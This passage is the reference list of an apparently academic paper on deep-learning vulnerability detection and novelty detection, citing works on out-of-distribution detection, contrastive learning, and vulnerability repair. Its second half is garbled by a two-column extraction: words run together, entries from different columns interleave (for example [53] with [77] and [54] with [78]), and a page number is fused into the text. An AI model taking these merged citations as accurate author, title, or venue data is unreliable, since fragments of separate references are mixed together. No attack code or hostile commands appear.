[34] V. Nguyen, T. Le, T. Pham, M. Dinh, and T. H. Le, "Kernel-based semi-supervised learning for novelty detection," International Joint Conference on Neural Networks (IJCNN), 2014.
[35] P. Duong, V. Nguyen, M. Dinh, T. Le, D. Tran, and W. Ma, "Graph-based semi-supervised support vector data description for novelty detection," International Joint Conference on Neural Networks (IJCNN), 2015.
[36] A. V. D. Oord, N. Kalchbrenner, and K. Kavukcuoglu, "Pixel recurrent neural networks," CoRR, vol. abs/1601.06759, 2016.
[37] T. Salimans, A. Karpathy, X. Chen, and D. P. Kingma, "PixelCNN++: Improving the PixelCNN with discretized logistic mixture likelihood and other modifications," CoRR, vol. abs/1701.05517, 2017.
[38] S. Liang, Y. Li, and R. Srikant, "Enhancing the reliability of out-of-distribution image detection in neural networks," CoRR, vol. abs/1706.02690, 2017.
[39] C. Guo, G. Pleiss, Y. Sun, and K. Q. Weinberger, "On calibration of modern neural networks," CoRR, vol. abs/1706.04599, 2017.
[40] B. Lakshminarayanan, A. Pritzel, and C. Blundell, "Simple and scalable predictive uncertainty estimation using deep ensembles," CoRR, vol. abs/1612.01474, 2016.
[41] E. Nalisnick, A. Matsukawa, Y. W. Teh, D. Gorur, and B. Lakshminarayanan, "Do deep generative models know what they do not know?" CoRR, vol. abs/1810.09136, 2018.
[42] H. Choi, E. Jang, and A. A. Alemi, "WAIC, but why? Generative ensembles for robust anomaly detection," CoRR, vol. abs/1810.01392, 2018.
[43] D. P. Kingma and P. Dhariwal, "Glow: Generative flow with invertible 1x1 convolutions," CoRR, vol. abs/1807.03039, 2018.
[44] D. Hendrycks, M. Mazeika, S. Kadavath, and D. Song, "Using self-supervised learning can improve model robustness and uncertainty," CoRR, vol. abs/1906.12340, 2019.
[45] D. Hendrycks and K. Gimpel, "A baseline for detecting misclassified and out-of-distribution examples in neural networks," The International Conference on Learning Representations (ICLR), 2017.
[46] G. Lin, J. Zhang, W. Luo, L. Pan, Y. Xiang, O. D. Vel, and P. Montague, "Cross-project transfer representation learning for vulnerable function discovery," IEEE Transactions on Industrial Informatics, 2018.
[47] H. K. Dam, T. Tran, T. Pham, S. W. Ng, J. Grundy, and A. Ghose, "Automatic feature learning for predicting vulnerable software components," The IEEE Transactions on Software Engineering, 2018.
[48] Z. Li, D. Zou, S. Xu, H. Jin, Y. Zhu, Z. Chen, S. Wang, and J. Wang, "SySeVR: A framework for using deep learning to detect software vulnerabilities," CoRR, vol. abs/1807.06756, 2018.
[49] V. Nguyen, T. Le, C. Tantithamthavorn, J. Grundy, H. Nguyen, S. Camtepe, P. Quirk, and D. Phung, "An information-theoretic and contrastive learning-based approach for identifying code statements causing software vulnerability," CoRR, vol. abs/2209.10414, 2022.
[50] V. Nguyen, T. Le, C. Tantithamthavorn, J. Grundy, H. Nguyen, and D. Phung, "Cross project software vulnerability detection via domain adaptation and max-margin principle," CoRR, vol. abs/2209.10406, 2022.
[51] M. Fu, C. Tantithamthavorn, V. Nguyen, and T. Le, "ChatGPT for vulnerability detection, classification, and repair: How far are we?" The Asia-Pacific Software Engineering Conference (APSEC), 2023.
[52] M. Fu, T. Le, V. Nguyen, C. Tantithamthavorn, and D. Phung, "Learning to quantize vulnerability patterns and match to locate statement-level vulnerabilities," CoRR, vol. abs/2306.06109, 2023.
14[53] M.Fu,V.Nguyen,C.Tantithamthavorn,D.Phung,andT.Le,“Vision [77] N.Srivastava,G.Hinton,A.Krizhevsky,I.Sutskever,andR.Salakhut- transformer-inspiredautomatedvulnerabilityrepair,”TheACMTransac- dinov, “Dropout: Asimple wayto prevent neuralnetworks fromover- tionsonSoftwareEngineeringandMethodology,2023. fitting,”TheJournalofMachineLearningResearch,vol.15,pp.1929– [54] M. Fu, C. Tantithamthavorn, T. Le, V. Nguyen, and D. Phung, “Vul- 1958,2014. repair: A t5-based automated software vulnerability repair,” The ACM [78] M. Abadi, P. Barham, J. Chen, Z. Chen, A. Davis et al., “Tensorflow: Joint European Software Engineering Conference and Symposium on A system for large-scale machine learning,” The USENIX Symposium theFoundationsofSoftwareEngineering(ESEC/FSE),2022. onOperatingSystemsDesignandImplementationOSDI,pp.265–283, [55] Z.Feng,D.Guo,D.Tang,N.Duan,X.Feng,M.Gong,L.Shou,B.Qin, 2016. T. Liu, D. Jiang, and M. Zhou, “Codebert: A pre-trained model for [79] A. Paszke, S. Gross, F. Massa, A. Lerer, J. Bradbury, G. Chanan, programmingandnaturallanguages,”CoRR,vol.abs/2002.08155,2020. T.Killeen,Z.Lin,N.Gimelshein,L.Antiga,A.Desmaison,A.Ko¨pf, [56] A.Vaswani,N.Shazeer,N.Parmar,J.Uszkoreit,L.Jones,A.N.Gomez, E.Z.Yang,Z.DeVito,M.Raison,A.Tejani,S.Chilamkurthy,B.Steiner, L.Kaiser,andI.Polosukhin,“Attentionisallyouneed,”TheConference L. Fang, J. Bai, and S. Chintala, “Pytorch: An imperative style, high- onNeuralInformationProcessingSystems(NIPS),2017. performancedeeplearninglibrary,”CoRR,vol.abs/1912.01703,2019. [57] E. Jang, S. Gu, and B. Poole, “Categorical reparameterization with [80] L. V. D. Maaten and G. Hinton, “Visualizing data using t-SNE,” The gumbel-softmax,”CoRR,vol.abs/1611.01144,2016. JournalofMachineLearningResearch,vol.9,pp.2579–2605,2008. [58] C. J. Maddison, A. Mnih, and Y. W. Teh, “The concrete distribution: A continuous relaxation of discrete random variables,” CoRR, vol. abs/1611.00712,2016. [59] J. Chen, L. Song, M. J. Wainwright, and M. I. Jordan, “Learning to explain:Aninformation-theoreticperspectiveonmodelinterpretation,” CoRR,vol.abs/1802.07814,2018. [60] C.E.Shannon,“Themathematicaltheoryofcommunication.” Warren Weaver.TheUniversityofIllinoisPress,Urbana,1998. [61] T.M.CoverandJ.A.Thomas,“Elementsofinformationtheory.” John WileyandSons,Inc.,2006. [62] N. Jethani, M. Sudarshan, Y. Aphinyanaphongs, and R. Ranganath, “Have we learned to explain?: How interpretability methods can learn to encode predictions in their interpretations,” The International Con- ferenceonArtificialIntelligenceandStatistics(AISTATS),2021. [63] TensorFlowAPI. (2023) Relaxedbernoulli. [Online]. Available: https://www.tensorflow.org/probability/api docs/python/ tfp/distributions/RelaxedBernoulli [64] P. Khosla, P. Teterwak, C. Wang, A. Sarna, Y. Tian, P. Isola, A.Maschinot,C.Liu,andD.Krishnan,“Supervisedcontrastivelearn- ing,”CoRR,vol.abs/2004.11362,2020. [65] M. Kim, J. Tack, and S. J. Hwang, “Adversarial self-supervised contrastive learning,” The Neural Information Processing Systems (NeurIPS),vol.33,pp.2983–2994,2020. [66] W. Wang, T. Zhou, F. Yu, J. Dai, E. Konukoglu, and L. Van Gool, “Exploringcross-imagepixelcontrastforsemanticsegmentation,”The IEEE/CVF International Conference on Computer Vision (ICCV), pp. 7303–7313,October2021. [67] B. Sun, B. Li, S. Cai, Y. Yuan, and C. Zhang, “Fsce: Few-shot object detectionviacontrastiveproposalencoding,”TheIEEE/CVFConference on Computer Vision and Pattern Recognition (CVPR), pp. 7352–7362, June2021. 
[68] Y.Du,F.Wei,Z.Zhang,M.Shi,Y.Gao,andG.Li,“Learningtoprompt foropen-vocabularyobjectdetectionwithvision-languagemodel,”The IEEE/CVF Conference on Computer Vision and Pattern Recognition (CVPR),pp.14084–14093,June2022. [69] P. Wang, K. Han, X.-S. Wei, L. Zhang, and L. Wang, “Contrastive learning based hybrid networks for long-tailed image classification,” TheIEEE/CVFConferenceonComputerVisionandPatternRecognition (CVPR),pp.943–952,June2021. [70] D.P.KingmaandJ.Ba,“Adam:Amethodforstochasticoptimization,” CoRR,vol.abs/1412.6980,2014. [71] Y. Chen, Z. Ding, L. Alowain, X. Chen, and D. Wagner, “Diversevul: Anewvulnerablesourcecodedatasetfordeeplearningbasedvulnera- bilitydetection,”TheInternationalSymposiumonResearchinAttacks, IntrusionsandDefenses(RAID),2023. [72] M.Brunsfeld,A.Hlynskyi,P.Thomson,A.Qureshietal.(2017)Tree- sitter.https://tree-sitter.github.io/tree-sitter/. [73] J. Tack, S. Mo, J. Jeong, and J. Shin, “CSI: novelty detection via contrastive learning on distributionally shifted instances,” CoRR, vol. abs/2007.08176,2020.